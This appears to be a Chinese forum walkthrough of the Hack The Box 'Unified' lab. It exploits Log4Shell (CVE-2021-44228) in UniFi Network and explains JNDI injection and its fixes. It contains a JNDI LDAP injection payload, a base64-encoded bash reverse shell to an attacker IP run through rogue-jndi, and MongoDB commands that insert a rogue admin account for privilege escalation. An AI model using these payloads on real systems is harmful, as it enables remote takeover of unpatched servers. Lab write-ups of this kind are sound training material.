Hack The Box Unified

darkap   ·   发表于 2023-09-08 17:37:29   ·   CTF&WP专版

TASK1

最早开放的是哪四个端口
22 6789 8080 8443
直接nmap扫描,然后就出来了
其实我也扫描过一些其他的真实的机器
给我最大的感触就是,还是有和很多的服务和协议不了解
每当面临这些东西的时候,总给我一种他漏洞百出而我却找不出来的感觉

TASK2

在端口8443上运行的软件的标题是什么?
通过web访问就可以了 UniFI network

TASK3

正在运行的软件的版本是什么?
这个上面有写
6.4.54

TASK4

漏洞的编号是什么?
cve-2021-44228
log4j的反序列化

TASK5

JNDI在注入中利用了什么协议?LDAP

TASK6

我们使用什么工具拦截流量,表明攻击成功?
Tcpdump

TASK7

我们需要拦截哪个端口的流量
389389端口就收到了数据报文,证明网站存在log4j漏洞

TASK8

MongoDB服务运行在哪个端口上?
第一步就是访问web,然后尝试登录一下
发现有remeber,抓个包

将remeber字段修改成payload
${jndi:ldap://10.10.14.128/o=tomcat}
然后在另起一个终端,使用tcpdump进行抓包
看看是否被请求

这说明是有漏洞的

原理

虽然知道漏洞的利用方法,但是我们还是要了解一下他的原理
Log4j2 远程代码执行漏洞(cve-2021-44228)
1、JNDI、RMI、LDAP、JNDI注入?
要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP…
Java Name and Directory(目录) Interface(接口):java命名和目录接口
是sun公司提供的一种标准的java命名系统接口,JNDI提供统一的客户端API,通过访问JNDI,根据命名服务或目录服务来获取相应的资源。

命名服务:一种简单的键值对绑定(k,v),可以通过键名检索值,RMI(远程方法调用)就是典型的命名服务。
目录服务:目录服务是命名服务的拓展,区别在于它可以通过对象的属性来检索对象,其实就是键比较复杂,比如找一个学生:年级->班级->姓名来查找,这些东西就是键,但是是层级关系,比较像目录。LDAP(轻量级目录访问协议)就是典型的目录服务。

说白了,其实JNDI只是对各种访问目录服务的逻辑进行了再封装,就是以前访问LDAP和RMI要写的代码差别很大,但是有了JNDI这一层(没有什么是加一层解决不了的,如果有就再加一层),就可以使用JNDI的方式来轻松访问RMI或LDAP服务,访问的代码基本是一样的(参考JDBC连接不同的数据库)

可以简单的将LDAP理解为一个存储目录,里面有我们要的资源,而JNDI就是获取资源的一种途径或者说方式。
如上图所示在访问RMI时只传了一个键foo过去,返回一个对象;
在访问LDAP这种目录服务时,传过去的比较复杂,包含多个键值对,这些键值对就是对象的属性,LDAP根据这些属性来判断返回哪个对象。

基本操作:

发布服务:bind() 将名称绑定到对象中
用名字查找资源:lookup() 通过名字检索执行的对象

JNDI注入:

动态协议转换:JNDI提前有配置初始化环境,设置了属性,但是当lookup()里传进来的参数协议与初始化的Context里配置的协议不一致时,就会动态的进行转换来查找传进去的参数,并且不会报错,所以当参数可控时,攻击者可以通过提供一个恶意的url地址来控制受害者加载攻击者指定的恶意类。

ctx.lookup("rmi://your-server/refObj");// 初始化的 //ctx.lookup("ldap://your-server/cn=bar,dc=test,dc=org");//实际上传进来的

命名引用:Java为了将Object对象存储在Naming(命名)或Directory(目录)服务下,提供了Naming Reference(命名引用)功能,对象可以通过绑定Reference类存储在Naming或Directory服务下,比如RMI、LDAP等。
也就是说存储的V中可以是一个超链接,我们根据K去查找V,找到之后发现是引用就会去引用的地址继续找然后返回相应的资源。

总结:
在LDAP中可以存储外部的资源,叫做命名引用,对应Reference类。比如远程HTTP服务的一个.class文件
如果JNDI客户端基于LDAP服务,找不到相应的资源,就会去LDAP中默认指定的地址请求(初始化配置的),如果是命名引用,会将这个文件下载到本地。
如果下载的.class文件包含无参构造函数或静态代码块,加载的时候会自动执行。因为下载之后会进行自动实例化。


在使用Reference时,我们可以直接将对象传入构造方法中,当被调用时,对象的方法就会被触发,创建Reference实例时几个比较关键的属性:
className:远程加载时所使用的类名;
classFactory:加载的class中需要实例化类的名称;
classFactoryLocation:远程加载类的地址,提供class数据的地址可以是file/ftp/http等协议;


当然,要把一个对象绑定到rmi注册表中(前面提到对象可以通过绑定Reference类存储在Naming或Directory服务下),这个对象需要继UnicastRemoteObject,但是Reference没有继承它,所以我们还需要封装一下它,用 ReferenceWrapper 包裹一下Reference实例对象,这样就可以将其绑定到rmi注册表,并被远程访问到了,demo如下:

Reference refObj = new Reference("refClassName","insClassName","http://ip:port/");
//第一个参数是远程加载时使用的类名,第二个参数是加载的class中需要实例化类的名称,第三个参数是远程class文件存放的地址
ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj );//进行包装继承
registry.bind("refObj ",refObjWrapper );//发布服务,将键与值绑定起来
当有客户端通过lookup(“refObj”)获取远程对象时,获取的是一个Reference存根(Stub),由于是Reference的存根,所以客户端会先在本地的classpath中去检查是否存在类refClassName,如果不存在则去指定的url(http://ip:port/refClassName.class)动态加载,并且调用insClassName的无参构造函数,所以可以在构造函数里写恶意代码。当然除了在无参构造函数中写利用代码,还可以利用java的static代码块来写恶意代码,因为static代码块的代码在class文件被加载过后就会立即执行,且只执行一次。
听起来有点绕,其实这个上面也提到过(总结2、3)
流程:

Log4j2 rce原理

首先log4j打印日志有四个级别:debug、info、warn、error,不管哪个方法打印日志,在正常的log处理过程中,对${这两个紧邻的字符做了检测,一旦遇到类似表达式结构的字符串就会触发替换机制。
一旦在log字符串中检测到${},就会解析其中的字符串尝试使用lookup查询,因此只要能控制log参数内容,就有机会实现漏洞利用。

所以最终还是会去调用JNDI的lookup方法,所以知道JNDI的注入原理就很好理解这次漏洞形成的原因了
Log4j2 rce原理:

修复思路

1、禁止用户请求参数中出现攻击关键字
2、禁止lookup下载远程文件(命名引用)
3、禁止log4j的应用连接外网
4、禁止log4j使用lookup
2.15版本修复方法:
修复后log4j2在jndi lookup中增加了很多限制:
默认不再支持二次跳转(命名引用)的方式获取对象
只有在log4j2.allowedLdapClasses列表中指定的class才能获取
只有远程地址是本地或者在log4j2.allowedLdapHosts列表中指定的地址才能获取


Task 9

What port is the MongoDB service running on?
此后所有的题目都是基于需要拿到目标的shell,而拿到shell的方法是利用CVE漏洞CVE-2021-44228,拿到shell以后,以下为拿到shell的过程:

通过log4j漏洞拿到shell需要借助以下脚本:
https://github.com/veracode-research/rogue-jndi
我们通过以下命令安装脚本并构建好服务器

git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package

mvn要安装maven
Maven是一个跨平台的项目管理工具。作为Apache组织的一个颇为成功的开源项目,其主要服务于基于Java平台的项目创建,依赖管理和项目信息管理。maven是Apache的顶级项目,解释为“专家,内行”,它是一个项目管理的工具,maven自身是纯java开发的,可以使用maven对java项目进行构建、依赖管理。

出现以下界面说明构建完

接着在命令行中将获取shell的脚本base64编码,注意替换为自己的ip地址
echo 'bash -c bash -i >&/dev/tcp/10.10.14.53/4444 0>&1' | base64

接着使用java将前面生成的base64填入下面的命令,同时记得更换为自己的地址
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuNTMvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.53"
出现如下界面表示运行成功

本地监听一下4444端口
nc -lnvp 4444
在burpsuite中重新发送一次,注意发送的请求,其中remember中的ip应该是自己的ip,我这个地方又变了是因为我又重新启动了靶机。

此时nc中会拿到目标机器的shell,而且用户是unif,以上步骤的整体操作如下:

接着升级为交互式shell,以方便的进行下一步
script /dev/null -c bash

回到刚刚那个问题:mongodb跑在哪个端口上?27117
ps aux | grep mongo


TASK 10

unifi的默认数据库名是什么?
答案:ace
知道了用户名后,我们可以通过终端连接进数据库

MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。
mongo --port 27117 ace

TASK11

枚举数据库的所有用户的函数是什么?
db.admin.find()
执行结果如下

TASK 12

问:mongodb中增加数据的函数是什么?
回答:db.admin.insert()

TASK 13


问:mongodb中更新数据的函数是什么?
回答:db.admin.update()

经过上面两个题目,我们大概能猜出来后面的思路是更新最高权限用户的密码,然后进到unifi的后台看看。
在添加用户之前,我们先要生成自己的密码,使用以下命令生成,记得最后是密码,自己更换为自己的。
mkpasswd -m sha-512 pilgrim

db.admin.insert({"email":"pilgrim@localhost.local","last_site_name"default","name":"unifiadmin","time_created":NumberLong(100019800),x_shadow":"$6$tVIuEdsp/Y4m8DBy$Dw6.glWpTSPKyxICzmNy.sSrJ9.EXzTsWb8mHd8z5njxPwZOi9pcGYgIjI0Ee./JFnES17WMLGexOiABG6m0"})
db.admin.insert({
  "email": "pilgrim@localhost.local",
  "last_site_name": "default",
  "name": "unifi-admin",
  "time_created": NumberLong(100019800),
  "x_shadow": "$6$tVIuEdsp/Y4m8DBy$Dw6.glWpTSPKyxICzmNy.sSrJ9.EXzTsWbK8mKHd8z5njxPwZOi9pcGYgIjI0Ee./JFnES17WMLGexOiABG6m0"
})


执行的结果

能看出执行成功,接着查找所以用户,然后获取到刚才添加的用户的objectid。
db.admin.find().forEach(printjson);

查看一下网站的用户的详细信息
db.site.find().forEach(printjson);


将我们插入的用户绑定到这个网站上去,其中的admin_id就是自己添加的用户的id,site_id就是上面获取的id

db.privilege.insert({"admin_id":"623f071e1ab0487109299461","permisions":[],"role":"admin","site_id":"61ce269d46e0fb0012d47ec4"});



接着去后台登录的页面登录刚才的账号,记得账户名是unifi-admin,密码是自己设置的密码。
这个地方要好久好久,等吧,多换几个浏览器试试也行。在setting中能知道root的密码如下:
NotACrackablePassword4U2022
然后ssh登录就行了

创作不易点个赞吧

用户名金币积分时间理由
Track-魔方 200.00 0 2023-09-10 20:08:55 深度 100 普适 100

打赏我,让我更有动力~

0 条回复   |  直到 2023-9-8 | 324 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.